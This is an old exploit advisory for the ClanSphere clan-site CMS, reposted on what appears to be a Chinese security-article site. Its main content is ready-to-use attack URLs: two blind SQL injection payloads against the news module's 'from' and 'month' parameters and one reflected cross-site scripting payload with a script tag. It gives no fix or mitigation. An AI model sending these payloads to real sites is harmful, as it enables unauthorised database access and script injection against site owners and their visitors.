ClanSphere 2010 Multiple Vulnerabilities

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ClanSphere 2010 Multiple Vulnerabilities

来源：vfocus.net 作者： Sweet 发布时间：2010-08-26

############################################################################
#                                                                          #
# Exploit Title: Clansphere Multiple vulnerabilities                       #
#                                                                          #
# Date: 24/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link:                                                           #
#                                                                          # 
# Download:http: http://sourceforge.net/projects/clansphere/               #
#                                                                          # 
# Version: all                                                             #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : HIGHT                                                             #
#                                                                          #
#                                                                          #
# Description :  clansphere offers some nice features for                  # 
#                                                                          #
# you to easily set up and maintain your proper clan site within minutes!  #
#                                                                          #
############################################################################

1- Blind Sql injection :

http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+

http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+

2-Xss :

http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>


Saha Ftourkoum et 1,2,3 viva L'Algerie :))

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告